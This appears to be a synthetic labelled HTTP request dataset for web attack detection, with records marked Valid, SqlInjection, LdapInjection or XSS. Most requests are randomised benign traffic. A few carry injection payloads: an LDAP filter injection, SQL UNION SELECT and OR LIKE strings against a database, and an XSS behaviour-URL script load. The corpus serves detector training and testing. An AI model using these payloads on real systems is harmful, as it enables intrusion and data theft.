If-Range: Thu, 14 Aug 08 14:53:44 GMT
Max-Forwards: 1
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bmlpYzl0OGw6bXNucw==
Range: 305687-,547-,2302-77763
Referer: http://www.mhove.st/atoet/DaIoysi/tteIta/9yc7/rwr1p.php
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/0.8 (Windows; U; WinNT 0.1; tn-ne; rv:1.6.6) Gecko/26118858
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8300x7095
Via: 7.1 www.atoeeo.gif, FTP/0.7 47.57.56.119:6
Transfer-Encoding: identity
Upgrade: beith2/0.5, Nfr/4.5, a7Do/7.7
Warning: 602 32.88.153.167:23729 "hrge" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30207
Start - Id: 34354
class: Valid
PUT /sr/pocYUpi.hmO4fLjwGhMX/TFC/pN_6XvT/bAjbG9Pc/1UeTP5_WtGYAB/eTU0Mm_RziNYt.j29/cee/barystL/9processing-instructionU6GD.php3? HTTP/1.0
Content-Length: 47
Content-Language: oniehDsW,c,ibIhtnl5
Content-Encoding: deflate
Content-Location: /l8s5/Soorh.jsp
Content-MD5: aGNpbnJzZXV5aXN0c3lvSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Aug 07 11:07:51 UTC
Last-Modified: Sun, 09 Apr 06 06:38:05 CET
Host: www.Ro2bnde.org
Connection: keep-alive
Accept: video/*;q=0.2, image/gif;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, identity, identity;q=0.8, identity
Accept-Language: z5e-tafVtb5, dewd-z;q=0.8, cef6s-se;q=0.2, rksi-ps;q=0.4
Cache-Control: max-age=2
Client-ip: 199.114.227.18
Cookie: i3=O$i
Cookie2: $Version="527"
Date: Wed, 02 Jun 04 05:52:11 CET
ETag: "UAwcpDUVrwyjUAu"
Expect: 100-continue
From: t2xq@eaabstcA.de
If-Modified-Since: Wed, 20 Oct 04 17:49:28 CET
If-Unmodified-Since: Wed, 22 Jul 09 04:46:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Jul 04 17:48:30 UTC
Max-Forwards: 37
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: ifhart lslanmi=rsdo
Range: 780-7889
Referer: http://opYgr.org/notfhc/moroa/xmrprit/tan8i/aavktsOt.exe
TE: gzip;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/9.1 (Windows; U; Win 9x 9.9; Ar-Se; rv:5.8.5) Gecko/57053253
UA-CPU: Sparc
UA-Disp: 6654,1299,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 015x732
Via: 6.2 120.93.225.96
Transfer-Encoding: deflate
Upgrade: wgm/3.9, moe/0.2, 2mn/3.5, eeqae/7.0
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 114.98.89.168
X-Serial-Number: 418428957866
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e1caioa0z6goki4=includehve&Smsw65=<87;L>E

End - Id: 34354
Start - Id: 38995
class: LdapInjection
GET /htpassN5shutdownDbodyjnY9O8connectB/etvBrqiornrtxa/40VMz4gfPCW2k/B9uJD79Kw1/tHincludexmlYli0/e-eqih.S/wp78TjSAgaeY.css?768c=dtmnhaEoYTe&WhLRHih7Wz=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&rMTL=uAhtacces6smobenituf HTTP/1.0
Host: 251.160.179.189:80
Connection: close
Accept: image/*;q=0.2, application/x-tar;q=0.4, text/html;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: c-itiicgs;q=0.1, iyx-oasm, tut-aolttiB, pdskwAw-teh;q=0.0, ee5-uatot;q=0.3
Cache-Control: only-if-cached
Cookie2: $Version="2"
Date: Sat, 29 Apr 06 02:04:58 UTC
ETag: W/"D4kBkEp7RtEZDZU7qq"
Expect: 100-continue
If-Modified-Since: Sat, 18 Sep 04 08:15:57 CET
If-Unmodified-Since: Sun, 25 Jan 04 16:18:28 GMT
If-Match: *
If-None-Match: *
If-Range: "bEQM14it5HWDdXlWuy9F"
Max-Forwards: 1999
MIME-Version: 9.7
Pragma: no-cache
Authorization: Digest uri=http://www.eojhr.gov/tubu/Fsoe/2aoiAw.tar
Range: -4
Referer: http://wpuO.de/e5hcaa/s6hsEdr/lhwp.php3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Windows; U; Win98 3.0; sn-aw; rv:0.8.5) Gecko/76866353
UA-CPU: StrongARM
UA-Disp: 542,569,16
UA-OS: Windows 98
Via: HTTP/6.7 www.pErme.html, dNam/2.3 71.43.22.223, HTTP/3.6 108.89.135.8
Transfer-Encoding: identity
X-Serial-Number: 2731422703648766

null

End - Id: 38995
Start - Id: 16397
class: Valid
GET /sZpzet9t/uf1W/havingxNlocationBj-dropUXqa1/-hl/icYA/aRqnlx6rTerhJciazb/cbe64ouSr/ti8mnnxVhSV.tiff?ieassg=oO%7E&no=460&jhkHs2onpv=86658&etl6j=s+baWwncsw7inafeU+&E2p=8519097&fesRyp=komeii6&tja08E2nvas=1fASvwoML&b5t=aefiadmin-Tqfi%5Dteosscs HTTP/1.1
Host: www.Bhej8o.it
Connection: sdanaco
Accept: audio/basic;q=0.7, audio/*;q=0.6
Accept-Charset: iso-8859-1;q=0.5, cp-936;q=0.4
Accept-Encoding: gzip;q=0.0, identity;q=0.7, compress, identity;q=0.8
Accept-Language: SrtAu7s-tm6d, eeca2q-sqySlt
Cache-Control: pNiiencj=hrbOc
Client-ip: 109.71.217.63
Cookie: 4ahe3lrerrist1=pNtwi4raooptq/;setheeet76dG=1405;bdesa=gjewarTeap
Cookie2: $Version="194"
Date: Sun, 19 Feb 06 14:02:29 CET
ETag: W/"ZIG0mH3usshyOTtm_5"
Expect: 100-continue
From: piRire@gfja0tm2d.be
If-Modified-Since: Thu, 31 Jul 08 14:11:36 GMT
If-Unmodified-Since: Sun, 11 Jan 09 02:09:27 GMT
If-Match: *
If-None-Match: "xlHy7F7si.JGmMt"
If-Range: "xstZ8WybvsGxmdpVMK."
Max-Forwards: 607
MIME-Version: 2.3
Pragma: vd=aehip
Proxy-Authorization: Digest opaque="e9apj"
Authorization: NTLM dGhJbnJQc2ZOd3N1YXRybWxmZXNhTmdobmNsaHR0ZWU1bmU5c2FvM3Fma2F5dw==
Range: 9-3931
Referer: /ehsdsT.php3
TE: trailers,trailers,trailers
Trailer: From
User-Agent: pnsd9gg/4.7.9.5.9
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 2.3 www.rnNd.jpeg:85959
Transfer-Encoding: identity
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 83.226.16.116
X-Serial-Number: 5481271353118244328
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16397
Start - Id: 16623
class: Valid
GET /Hfromf/aqs/gmmtf4dsyklcDnslt/8Z6l/8oclsdohe.php? HTTP/1.1
Host: 91.235.121.10:4
Connection: dJznm9h
Accept: application/rtf;q=0.8
Accept-Charset: hz-gb-2312;q=0.6, shift_jis;q=0.2
Accept-Encoding: identity, gzip;q=0.5
Accept-Language: *
Cache-Control: max-stale=28516
Client-ip: 188.193.61.219
Cookie: tSttsn=1;aomoo=nctw96T6ts;EiduAhnewf3e=nrocwdita;ai=and;mhmete=egroup byi0V8a)xot8t
Cookie2: $Version="330"
Date: Mon, 30 Apr 07 08:41:22 CET
ETag: W/"jan28hfMU5ZG@F7I@1"
Expect: 100-continue
From: 7seuv@bk2haa.ch
If-Modified-Since: Sun, 27 Dec 09 10:31:27 CET
If-Unmodified-Since: Thu, 18 Mar 04 11:03:15 GMT
If-Match: *
If-None-Match: "0w0kXxo9lfr7sANNOcES"
If-Range: "F7mjkCq.z8qR_Y2dhk"
Max-Forwards: 21
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Ie30xo rqese=Ueloh7et
Authorization: dtsda hLkoq0tv=ywEzoai
Range: -51502,35-0418,-016
Referer: http://www.ru2esNsc.com/atrlH6s/tutde/etqtdon/oes9eAeO.jpg
TE: trailers,deflate;q=0.7,deflate
Trailer: From
User-Agent: peted (eDJ7cPB65; bzPcB-E)
UA-CPU: 68000
UA-Disp: 2902,213,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 702x893
Via: 6.8 www.htnht.shtml, 9.9 www.auYsEgms.jpeg, 7.7 205.238.235.145
Transfer-Encoding: zemn6; 7uihy=tr3aldn
Upgrade: lte/0.8, ascmyo/0.4
Warning: 144 84.222.150.233 "udseldAuvnntiswe" "Tue, 18 Apr 06 02:19:07 UTC"
X-Forwarded-For: 2.103.180.182
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16623
Start - Id: 31967
class: Valid
GET /b8GuMm-7x/e@TMKqHu_HoTG8sCQ6zy/rGO/ixI/mSHdq8dcrU7W@k/nxpTOXUF/fctiq3hEeunow14Jxzoe.jpeg?Wnschmn=oailtitIa4&f2qIt1nuses=awp-s&0or=fGET4E.K HTTP/1.1
Host: 205.73.20.168
Connection: close
Accept: application/zip;q=0.7, application/rtf;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.3, utf-8, hz-gb-2312, iso-8859-9, iso-8859-1
Accept-Encoding: deflate, compress;q=0.8
Accept-Language: tDdxc-e;q=0.2, 4z-u, 3xrmra-ayo9nn, ksc-ree2;q=0.5, h-9e;q=0.2
Cache-Control: no-store
Client-ip: 86.30.4.187
Cookie: nahqrhfpa=5;cyrjris1c=ratel;nalezkst1vp9wur=tedceOOL_.;oowUwoiRlifcscu=htnk;i7aioonsamsl=isd ;Ne.A8YNR=dsxoe9weeirnddhafw
Cookie2: $Version="097"
Date: Fri, 09 Apr 04 19:58:12 GMT
ETag: "In.qyNzG@o4PGCO3Jld_"
Expect: oh4tn
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sun, 12 Jun 05 03:34:21 GMT
If-Unmodified-Since: Wed, 17 May 06 12:20:21 UTC
If-Match: *
If-None-Match: "XPSYeB4q8fUlhovzfd"
If-Range: "MUszFuCrnank7.GpTI"
Max-Forwards: 14
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: etsnds WdnRHatk=rhdNp
Authorization: dhst zto6Ee=rettlage
Range: -3
Referer: /tosson5/h83p/lfh1vfad.aspx
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: otruiocl (1MQgSzFG)
UA-CPU: x86
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: 0.5 204.74.56.130:0490
Transfer-Encoding: identity
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 372913
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31967
Start - Id: 29140
class: Valid
GET /ep.IRW-Y/ncYoxterm/oGGA4gHM2u0gq9gHd/j2a5/6Uv22kb8WHtWpked572i.php3?2oobystwe=eeswiti&roe6Shsar=7910915234&optK35wgetNnph-@=24871893 HTTP/1.0
Host: www.s1hrteyIn.com:1370
Connection: keep-alive
Accept: application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=392
Client-ip: 155.217.178.62
Cookie: wsttOet=1ebH-_FiX
Cookie2: $Version="4"
Date: Thu, 14 Jan 10 15:59:33 GMT
ETag: "2fcfWijE.03EDxaTmu"
Expect: 100-continue
From: o6sF@ibcs.cz
If-Modified-Since: Sat, 02 May 09 21:50:53 CET
If-Unmodified-Since: Fri, 29 Dec 06 19:24:51 UTC
If-Match: *
If-None-Match: *
If-Range: "jC2HAdGS5UC7gulXF"
Max-Forwards: 522
MIME-Version: 6.1
Pragma: lepAotso='Mxtwr5'
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: aeucof rrpoheeq=npBlr
Range: -6
Referer: http://avThhds.it/wj8iHi.php
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.2 (compatible; MSIE 2.0; WinNT; aaeihe; nnsnT; snaeEo)
UA-CPU: MIPS
UA-Disp: 3256,3323,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 466x304
Via: 5.4 www.rwioi.jpeg, FTP/5.4 www.ak3QR.css, HTTP/3.8 223.115.50.71
Transfer-Encoding: eOa3r; tnd2lgoa=nycidv
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 15.219.134.176
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29140
Start - Id: 8554
class: Valid
GET /keb/rZM0zflV9gN/aKnEhaxUHx.php3?eetoOp=tot%7Ct%7CEaunione%3Bo&tarlheSuv=huq&ith=4n3..-Im8&Ahisalrsc=abe&ea=iGwcSp%404G&deen=%29sta%3Cgawvtte&emlghybsapzm8l=5&teaap=192954&aduitawene=0mbhgto7uu&za=25615332 HTTP/1.1
Host: 30.95.128.139:80
Connection: oltec
Accept: image/*;q=0.4, application/postscript, video/*
Accept-Charset: cp-936, windows-1257, windows-1255;q=0.9
Accept-Encoding: identity;q=0.3
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 77.176.94.89
Cookie: os=surs=at;ruDisa7N4o=ctTmeebze;tmpQPqlsS4insertmZW=815
Cookie2: $Version="667"
Date: Wed, 14 Feb 07 03:15:01 GMT
ETag: W/"xDX2W8T9A@lrb-.t"
Expect: 100-continue
From: hiao@Soldae.uk
If-Modified-Since: Wed, 09 Jun 04 18:56:44 UTC
If-Unmodified-Since: Mon, 12 May 08 04:18:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Jan 05 14:20:28 UTC
Max-Forwards: 422
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=8dbndemk
Authorization: NTLM SWlvZTdjZW5ub2RubGFoc3Noa3RwY2FpZTlSb2thcnRzczd0Z2c=
Range: 288-033,80242-026
Referer: /ueoayasf/leSztkR8/jtbd.jsp
TE: chunked,deflate;q=0.4,deflate
Trailer: Accept-Language
User-Agent: okah6ianlltphiroaT
UA-CPU: Sparc
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 108x957
Via: 1.0 249.15.77.242, 6.9 225.184.91.60, FTP/2.0 www.rxuerw.jpeg:723
Transfer-Encoding: identity
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 962 29.200.220.17:9962 "dseiv8noti" 
X-Forwarded-For: 170.20.120.214
X-Serial-Number: 1101244
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8554
Start - Id: 42788
class: SqlInjection
POST /7lignei1soaqi/HeQfedpXaimtovhhSkg/rf/vZq6xthtpassVuAY4B/YS6L8QUfxWZaa/rHReiwyoe/dtsapWeixaci14te/9d.png? HTTP/1.0
Content-Length: 43
Content-Encoding: identity
Content-MD5: dTBoZWxlbG9zbm9tQmV1Zg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 09 Mar 05 12:21:36 UTC
Host: www.aiegn.biz
Connection: ZbTsle
Accept: */*
Accept-Encoding: deflate;q=0.8, identity;q=0.8
Accept-Language: asxUkr3m-nEt, to-Nyahdasr;q=0.3, n-snoOgK, eensai-iweS
Cache-Control: only-if-cached
Cookie: re6atoase=utxank;thlrqopto7=baHs;tseAtlesittnzcx=2804;Rr=OR  'oolai'   LIKE     'Sim%'
Date: Thu, 31 Dec 09 07:53:23 GMT
ETag: "cgY.nDUdJO7yjzxPF_"
If-None-Match: *
Max-Forwards: 1
Referer: /eIueoeeb/geto/rpHy/dargrlrt.jsp
User-Agent: Mozilla/5.5 (X11; U; Open BSD i586 6.5; wx-Ee; rv:4.5.7) Gecko/50037776
UA-Disp: 5034,6041,16
UA-Pixels: 952x987
Transfer-Encoding: identity
----: --------------------

0liu=tenaowEedcsLe&riR3extehl=jbE&aaaeEs=15

End - Id: 42788
Start - Id: 4121
class: Valid
POST /n-cTU/bw/eJjpJa8T.swf? HTTP/1.1
Content-Length: 97
Content-Language: er1eaeew,ihtEne
Content-Encoding: compress
Content-Location: http://www.Oe5utNr.cz/rnpjLh/ppt9sA/oT3oa.aspx
Content-MD5: cmg3c3JpYW1Tb2VtNzVpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 04:01:16 UTC
Last-Modified: Wed, 19 Oct 05 13:16:18 UTC
Host: 116.167.232.182
Connection: keep-alive
Accept: video/*, text/xml, application/rtf
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: ee-bpnzoec, i4be-faaL6Eci, ohhei-E;q=0.7, sszlyl-ke
Cache-Control: bipbntie='tj1dexgt'
Client-ip: 75.22.78.39
Cookie: ahw0tniElT3t1=tlsuisNdaiownf;x3bqJljjidN6=ecRbe3
Cookie2: $Version="692"
Date: Sat, 09 Dec 06 12:44:16 CET
ETag: W/"AKB.Xa_XpRk0FJGXeme"
Expect: 100-continue
From: tEpEp@tir3gian.cz
If-Modified-Since: Mon, 06 Apr 09 20:57:27 CET
If-Unmodified-Since: Fri, 02 Sep 05 23:05:43 GMT
If-Match: *
If-None-Match: "hh@FT3TtVl8_6Cc"
If-Range: Tue, 10 Nov 09 22:49:01 GMT
Max-Forwards: 9
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Digest cnonce="baaide"
Range: 80947-315
Referer: /eiss.ace
TE: gzip,chunked;q=0.6,chunked
Trailer: Pragma
User-Agent: sRTqtLei/3.5.2
UA-CPU: StrongARM
UA-Disp: 192,906,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5654x5319
Via: 7.2 82.143.216.4, 6.2 169.74.154.61, FTP/5.9 8.170.170.18
Transfer-Encoding: compress
Upgrade: txgQ/6.8, rwt/5.6, p7law4/7.6, Pi4lm/5.6
Warning: 595 www.endswe0t.htm "rojqzsooogwsngCtsaaa" 
X-Forwarded-For: 120.79.175.50
X-Serial-Number: 471364485735177
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i4yrUx9bgsound=iwgonksnijosao3tn&tnblhahikgtE7a=qZUhpaQ3n&n7Xiek8gtcefczu=hhg&esoPe6craard7i8=euu

End - Id: 4121
Start - Id: 15913
class: Valid
GET /4s7td3n4cwsnmne5d3/sieaa/@umZZLMA_AczlP/Je7/uusfi/evr2oPjqb@@HVy/VhoRhtpassVGphp.jsp?ZDTin.=exec1sClm&Noo9e1lwe0tv=294 HTTP/1.1
Host: 122.70.241.70:80
Connection: close
Accept: text/*, text/xml;q=0.3, image/gif;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 12.135.89.242
Cookie: tr1h8nem9lteea=7436896;paaeneoe5=7uy w?aSr\passwdChjopen;exectabopen=iEq5tgA;Se8lSrednldEore=eqHVjq1hiKVb;fedrh6=btb5
Cookie2: $Version="8"
Date: Sun, 15 May 05 02:27:08 CET
ETag: W/"IIjGxTBFWu7BUD7KD8"
Expect: 100-continue
From: rdeheo@87jlxnnr1b.com
If-Modified-Since: Sat, 14 Feb 04 12:53:48 CET
If-Unmodified-Since: Mon, 21 Aug 06 03:52:25 GMT
If-Match: "I8nvZw6IF0DaXRHC5L"
If-None-Match: "42oXLsShRuvE.qcq"
If-Range: Mon, 01 May 06 03:03:25 UTC
Max-Forwards: 542
MIME-Version: 2.7
Pragma: a=ehrsjele
Proxy-Authorization: NTLM ZnRheWJjb25teHVUM2lhU2hTaHlTaHM3cXNCdENQbmxsNQ==
Authorization: Basic b2VvazplaWFhZWF1cA==
Range: 24232-,-81,-37455
Referer: http://sacm.it/aSOhtgs.shtml
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: 8m2-b6CRnl http://www.Tney3ncl.net
UA-CPU: x86
UA-Disp: 1586,328,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 809x4500
Via: FTP/3.6 www.iear.htm
Transfer-Encoding: identity
Upgrade: auc/1.8
Warning: 168 www.pbkslL.tiff "cad37ddmsf" "Thu, 31 Jan 08 09:57:52 UTC"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 721965
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15913
Start - Id: 35145
class: SqlInjection
PUT /ffeOjo.pl? HTTP/1.1
Content-Length: 188
Content-Language: 9nin9get
Content-Encoding: gzip
Content-Location: http://www.wSnarta1.st/tt4n8/6rsolhsi/Ndbq/Eioierht/tdsuqsnl.tiff
Content-MD5: MjhzdnRNdWVpZ3JyeWxOaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Oct 05 23:49:39 CET
Last-Modified: Tue, 07 Jun 05 07:18:44 CET
Host: 157.210.225.167:4
Connection: close
Accept: application/*, image/*;q=0.3, audio/basic
Accept-Charset: cp-932;q=0.0, gb2312;q=0.0, windows-1255;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 104.27.173.11
Cookie: ptsEdzns5pc=526149
Cookie2: $Version="374"
Date: Tue, 05 Oct 04 13:20:52 GMT
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Mon, 09 May 05 18:19:01 UTC
If-Match: "V@5-SiSROLbdAeh53"
If-None-Match: "GxGrghoiNRTNfOd1Zf"
If-Range: Tue, 02 Oct 07 09:42:20 CET
Max-Forwards: 9
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: 7iitOy aipr=ieNad
Range: 63-383,700-,-5
Referer: http://www.lQbhxe.be/fhters/namtrrf/o2rdc4o/asst/cojmib.cfm
TE: trailers
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 9.0; 5o-iy; rv:9.5.7) Gecko/87354409
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 1.6 www.itil1zae.png
Transfer-Encoding: identity
Upgrade: lhX/2.1, ocobie/1.5
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mh8anson1=chairs' UN/**/ION     SEL/**/ECT     Vw  FROM    dba_users     WHERE    dlpos   like     '%25&n5vbscriptAXPdFl=sbt&ce=272&uoaclosetmrfaf=yrhwma9&Zt_LAhmailmc=iUtnra

End - Id: 35145
Start - Id: 47855
class: XSS
GET /4Z7SWBbiall_ZMhox/wcNITN_9kq95gYPoR/dHv3/vY5VtVwU0d.oD/RafredoTetTil3/nuc50p3Cqxlqz/uasekOoei1dgnenyaox/aKUH3@fv4_I.exe?KyMpcTbO9Y=cxlapbtyolv1cmatio&laa=19982453&tlAifzpWe=tPzk_zfhae46&ogaAo=smglezq&yandGUcate=mQTNIdV%40&ht1vhhe2=ea9lnr1pQnnlgeowdr&dHfN=%3Cdiv+++++style++++%3D++++%22+++behaviour%3A+url%28%5Bhttp%3A%2F%2Fwww.erel.com%2Fscript%2FxenhdSrets.mspx%5D%29%3B++++%22++%3E&@TtRaZ=eub_bv&0vF@U=xclnotuuu4 HTTP/1.0
Host: www.rtie8aaenu.biz
Connection: seag
Accept: */*;q=0.1
Accept-Charset: windows-1250;q=0.4
Accept-Encoding: compress;q=0.4, gzip, gzip;q=0.4, deflate, gzip;q=0.3
Accept-Language: c-aieh33
Cache-Control: zhpqs='Elesiu'
Client-ip: 237.181.40.228
Cookie: eathw2=2endnfha5baUaao;6d=ajol;vyUlw=711982;eostdsaot0adeg=ilolwXy-f;xterm4-5=  a esIea0efu
Cookie2: $Version="985"
Date: Thu, 27 Mar 08 21:07:26 CET
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: mrthhp=AsnbEEk;eeuvr
From: tioExt@xadhwC.ch
If-Modified-Since: Wed, 01 Jun 05 22:15:51 UTC
If-Unmodified-Since: Wed, 10 Aug 05 18:50:52 CET
If-Match: "bpC.jAKUt2HkyzhoKik"
If-None-Match: *
If-Range: *
Max-Forwards: 367
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest opaque="dafoil"
Range: 595606-7,222673-07
Referer: http://www.e3ittm.net/qdel/0rrJmni.png
TE: trailers
Trailer: Trailer
User-Agent: sNcca/5.7.7.0.1
UA-CPU: x86
UA-Disp: 4309,162,32
Via: 7.9 www.tesnn.tiff:38
Transfer-Encoding: gzip
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 188.24.5.207
X-Serial-Number: 110017564718
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47855
Start - Id: 31118
class: Valid
GET /ioits/Zotsstmnetlrt.php3?ZId8n=9&ta0bs7o=4317847&tQeyoa=eKCJ&ueksj9elql=3491335526&slgh=3b&le5mTOBwouennvT=eFq5&Dw=fv6wmO&9tsmsrteI=leHds7ahCbrLOcw&ye=+&ek2s=je2 HTTP/1.1
Host: 219.182.61.150
Connection: 9athoeuS
Accept: video/*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 148.177.138.70
Cookie: hoRll=427412;0snoat=ihw3;etctxmo35=t1s8QhUXnh;oVtkamRKLupdatebc=n;nmactndlHaa=t5Ydocumenty
Cookie2: $Version="98"
Date: Tue, 14 Nov 06 08:17:15 UTC
ETag: W/"X8IqT4uU2JG9mV1H"
Expect: 100-continue
From: ymshapre@ekifwm.com
If-Modified-Since: Fri, 10 Jul 09 24:46:28 CET
If-Unmodified-Since: Sun, 19 Aug 07 19:09:36 GMT
If-Match: "K5_WB@qFU6Z@dIk_ZgB"
If-None-Match: *
If-Range: "WAPKjFhqDeuPVes"
Max-Forwards: 5
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: Rtdng vlyb=aebDlmt
Range: -245173,089218-6894
Referer: http://www.rxlvgfSy.it/Enue/alfj/mriNr8s6.msf
TE: trailers
Trailer: TE
User-Agent: Mozilla/2.5 (compatible; tsorenunc; WinNT; anotttmiAa; IoaedNrae; qshDT)
UA-CPU: PowerPC
UA-Disp: 501,589,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2629x943
Via: FTP/9.9 www.eauety.jpeg, 9.4 www.twthcee7.js:08
Transfer-Encoding: deflate
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 375 131.95.34.188 "i1afonrtcrqn" 
X-Forwarded-For: 38.240.20.147
X-Serial-Number: 16589272146
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31118
Start - Id: 14459
class: Valid
GET /eesig0k/nVMwIubGz0hNxtCL6/s6B/Yk@XYBN6HU/srlI.F2VxZl@W23p/https3mD6baEBM86/ku1V-KP5mU9_W0OWqH/rwwRhnu9honm.jpeg?bSSi=4040926314&ehnherceL=rannvo&zinro0rtem=75783&nne=wTApQLCT2&seadfwofO=h1dr7ieelnenees HTTP/1.1
Host: www.uhapr7ecdc.ch:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 34.163.123.98
Cookie: loa=h -hexec;ksonee=3918929;6O6D9P.WfSD_=linkChlinkm;TfVSNscript3CxUXP=6aenmdemY;dAenKenia= ftp;iDggwFB=599
Cookie2: $Version="0"
Date: Mon, 16 Oct 06 16:16:58 UTC
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: m27ream=trweDECn;enp9
From: inuozal@th8rsa.cz
If-Modified-Since: Fri, 06 Jan 06 20:36:27 CET
If-Unmodified-Since: Mon, 10 Dec 07 05:34:21 GMT
If-Match: "o532Mggw@.9NNDkDA"
If-None-Match: "WGwqc_aM99lCm9sOI6"
If-Range: Wed, 16 Jul 08 22:54:02 GMT
Max-Forwards: 3
MIME-Version: 2.3
Pragma: gnnet='yro'
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: Basic eWx0cXM6bG5pYQ==
Range: 063-,416644-557318
Referer: http://nt0ecbQN.fr/keiv/grege.sh
TE: gzip;q=0.9,deflate;q=0.7
Trailer: From
User-Agent: nlaehoIgnntqeklp
UA-CPU: 68000
UA-Disp: 6368,730,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5927x518
